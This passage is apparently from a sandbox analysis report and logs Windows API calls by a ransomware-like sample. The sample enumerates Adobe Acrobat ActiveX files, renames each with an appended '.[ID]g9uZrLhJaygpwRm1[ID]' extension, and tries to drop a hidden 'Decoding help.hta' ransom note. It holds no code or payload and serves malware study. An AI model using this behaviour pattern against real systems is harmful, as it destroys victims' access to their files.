Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP" [0046.378] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP.[ID]g9uZrLhJaygpwRm1[ID]" [0046.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.esp"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.esp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.416] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d95e8c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.EUQ", cAlternateFileName="")) returned 1 [0046.416] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.416] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.416] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.416] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.416] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.416] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.416] CloseHandle (hObject=0xffffffff) returned 0 [0046.416] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.417] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.EUQ") returned 1 [0046.417] lstrlenW (lpString="AcroPDF.EUQ") returned 11 [0046.417] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.417] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.417] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.EUQ" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ" [0046.417] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ" [0046.417] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ.[ID]g9uZrLhJaygpwRm1[ID]" [0046.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.euq"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.euq.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.417] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8ec4a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.FRA", cAlternateFileName="")) returned 1 [0046.417] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.417] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.417] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.417] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.417] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.417] CloseHandle (hObject=0xffffffff) returned 0 [0046.418] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.418] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.FRA") returned 1 [0046.418] lstrlenW (lpString="AcroPDF.FRA") returned 11 [0046.418] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.418] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.418] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.FRA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA" [0046.418] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA" [0046.418] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA.[ID]g9uZrLhJaygpwRm1[ID]" [0046.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.fra"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.fra.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.418] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d95e8c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.HRV", cAlternateFileName="")) returned 1 [0046.418] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.418] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.418] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.418] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.418] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.418] CloseHandle (hObject=0xffffffff) returned 0 [0046.418] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.419] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.HRV") returned 1 [0046.419] lstrlenW (lpString="AcroPDF.HRV") returned 11 [0046.419] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.419] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.419] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.HRV" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV" [0046.419] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV" [0046.419] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV.[ID]g9uZrLhJaygpwRm1[ID]" [0046.419] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hrv"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hrv.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.419] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d95e8c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.HUN", cAlternateFileName="")) returned 1 [0046.419] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.419] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.419] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.419] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.419] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.419] CloseHandle (hObject=0xffffffff) returned 0 [0046.419] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.419] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.HUN") returned 1 [0046.420] lstrlenW (lpString="AcroPDF.HUN") returned 11 [0046.420] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.420] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.420] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.HUN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN" [0046.420] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN" [0046.420] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN.[ID]g9uZrLhJaygpwRm1[ID]" [0046.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hun"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hun.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.463] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8c6340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.ITA", cAlternateFileName="")) returned 1 [0046.463] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.463] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.463] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.463] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.463] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.463] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.463] CloseHandle (hObject=0xffffffff) returned 0 [0046.464] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.464] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.ITA") returned 1 [0046.464] lstrlenW (lpString="AcroPDF.ITA") returned 11 [0046.464] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.464] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.464] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.ITA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA" [0046.464] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA" [0046.464] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA.[ID]g9uZrLhJaygpwRm1[ID]" [0046.464] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ita"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ita.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.464] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8c6340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4be00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.JPN", cAlternateFileName="")) returned 1 [0046.464] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.464] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.464] 